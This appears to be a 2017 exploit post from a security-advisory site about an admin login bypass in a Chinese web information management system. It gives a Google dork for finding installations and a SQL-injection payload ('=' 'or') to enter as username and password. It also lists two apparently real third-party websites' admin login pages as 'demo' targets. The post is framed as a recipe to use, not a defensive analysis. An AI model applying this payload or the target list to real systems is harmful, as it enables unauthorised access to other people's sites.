创梦网络信息管理系统 Admin Login Bypass

Published
Credit
Risk
2017.04.20
3F-Team
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes
Dork: intext:"创梦网络信息管理系统"

======================================================
# Exploit Title: 创梦网络信息管理系统 Admin Login Bypass
# Google Dork: intext:"创梦网络信息管理系统"
# Date: 20/04/2017
# Author: sohaip-hackerDZ
# Team: 3F-Team
# Facebook: https://www.facebook.com/sohaipbarika
# Tested on: linux mint x64
***************************************************
[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: '=' 'or'
[+] Password: '=' 'or'
======================================================
[+] Demo Site
[+] http://www.rayleepaper.com/admin/login.php
[+] http://www.gzcmok.cn//admin/login.php
======================================================
Thanks To 3F-Team
sohaip-hackerDZ | maxhacker |


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com